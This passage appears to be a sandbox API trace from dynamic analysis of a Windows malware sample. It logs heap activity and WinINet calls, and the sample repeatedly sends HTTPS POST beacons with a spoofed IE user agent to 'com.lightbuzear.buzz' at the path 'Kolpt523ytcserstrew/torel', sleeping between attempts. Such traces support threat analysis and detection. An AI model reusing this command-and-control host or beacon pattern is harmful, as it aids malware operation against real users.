hHeap=0x4780000) returned 1 [0296.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0296.454] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beac8 | out: hHeap=0x4780000) returned 1 [0296.454] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beac8 [0296.455] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0296.455] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0296.455] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0296.455] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0296.456] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0296.456] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0296.456] FreeLibrary (hLibModule=0x71780000) returned 1 [0296.456] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0296.456] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0296.456] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0296.456] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0296.457] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0296.457] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0296.457] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0296.457] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0296.457] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0296.457] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0296.457] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0296.457] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0296.457] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0296.457] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ebb8 [0296.457] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0296.457] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eb58 [0296.457] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebb8 | out: hHeap=0x4780000) returned 1 [0296.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0296.458] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb58 | out: hHeap=0x4780000) returned 1 [0296.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eb58 [0296.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5a0 [0296.458] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5a0 | out: hHeap=0x4780000) returned 1 [0296.458] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0296.458] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5a0 [0296.458] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0296.459] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be640 [0296.459] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0296.459] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0296.459] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0296.459] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0296.459] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0296.459] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0296.459] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0296.459] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0296.459] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0296.459] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed20 [0296.459] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0296.459] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ebb8 [0296.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0296.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0296.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebb8 | out: hHeap=0x4780000) returned 1 [0296.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ebb8 [0296.460] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be668 [0296.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be668 | out: hHeap=0x4780000) returned 1 [0296.460] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0296.460] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0296.461] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0296.461] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0296.461] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0296.461] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0296.461] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0296.461] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0296.461] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0296.461] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0296.461] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0296.461] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed20 [0296.461] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0296.461] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480edc8 [0296.461] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0296.461] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0296.462] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edc8 | out: hHeap=0x4780000) returned 1 [0296.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be668 [0296.462] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0296.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0296.462] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be668 | out: hHeap=0x4780000) returned 1 [0296.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be668 [0296.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0296.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ff0 [0296.462] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0296.463] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0296.463] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0296.463] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0296.463] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ff0 | out: hHeap=0x4780000) returned 1 [0296.464] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0296.464] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0296.464] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0296.464] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0296.464] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0296.464] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0296.465] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0296.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0296.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0296.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480edc8 [0296.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0296.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f200 [0296.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edc8 | out: hHeap=0x4780000) returned 1 [0296.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0296.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f200 | out: hHeap=0x4780000) returned 1 [0296.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814ff0 [0296.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0296.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0296.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ff0 | out: hHeap=0x4780000) returned 1 [0296.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ff0 [0296.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0296.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830de0 [0296.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0296.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0296.475] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0296.476] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0297.941] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830de0 | out: hHeap=0x4780000) returned 1 [0297.941] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0297.941] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0297.942] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0297.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0297.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0297.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0297.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0297.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0297.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0297.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0297.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0297.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0297.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f200 [0297.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0297.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed20 [0297.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f200 | out: hHeap=0x4780000) returned 1 [0297.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0297.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0297.942] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9c80 [0297.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0297.943] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0297.943] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9c80 | out: hHeap=0x4780000) returned 1 [0297.943] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9c80 [0297.943] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0297.943] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830de0 [0297.943] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0297.943] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0297.944] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0297.944] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0297.944] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830de0 | out: hHeap=0x4780000) returned 1 [0297.944] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0297.944] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0297.944] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0297.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0297.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0297.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0297.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0297.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0297.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0297.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0297.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed20 [0297.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0297.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480edc8 [0297.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0297.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0297.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edc8 | out: hHeap=0x4780000) returned 1 [0297.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830de0 [0297.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0297.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0297.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830de0 | out: hHeap=0x4780000) returned 1 [0297.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830de0 [0297.945] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0297.946] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47c3d88 [0297.946] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0297.946] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0297.946] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0297.947] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0297.947] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47c3d88 | out: hHeap=0x4780000) returned 1 [0297.947] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0297.947] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0297.947] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0297.947] FreeLibrary (hLibModule=0x71570000) returned 1 [0297.947] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0297.947] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0297.948] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be640 | out: hHeap=0x4780000) returned 1 [0297.955] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5a0 | out: hHeap=0x4780000) returned 1 [0297.956] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0297.956] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800578 | out: hHeap=0x4780000) returned 1 [0297.956] Sleep (dwMilliseconds=0x2710) [0297.981] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0297.981] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0297.982] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0297.982] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0297.982] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0297.982] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0297.982] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0297.982] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0297.982] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0297.982] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eaf8 [0297.982] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0297.982] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec78 [0297.982] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eaf8 | out: hHeap=0x4780000) returned 1 [0297.982] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0297.982] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0297.982] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ebd0 [0297.982] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0297.983] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0297.983] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0297.983] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0297.983] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0297.983] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0297.983] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0297.983] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0297.983] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0297.983] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0297.983] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0297.983] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0297.983] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0297.984] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0297.984] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec78 [0297.984] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0297.984] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed20 [0297.984] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0297.984] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0297.984] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0297.984] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be640 [0297.984] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0297.984] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0297.984] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be640 | out: hHeap=0x4780000) returned 1 [0297.984] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5a0 [0297.984] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0297.984] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be640 [0297.985] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0297.985] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0297.985] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0297.985] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0297.985] FreeLibrary (hLibModule=0x71780000) returned 1 [0297.986] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be640 | out: hHeap=0x4780000) returned 1 [0297.986] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0297.986] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be640 [0297.986] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0297.986] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0297.986] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0297.986] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0297.987] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0297.987] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0297.987] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0297.987] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, 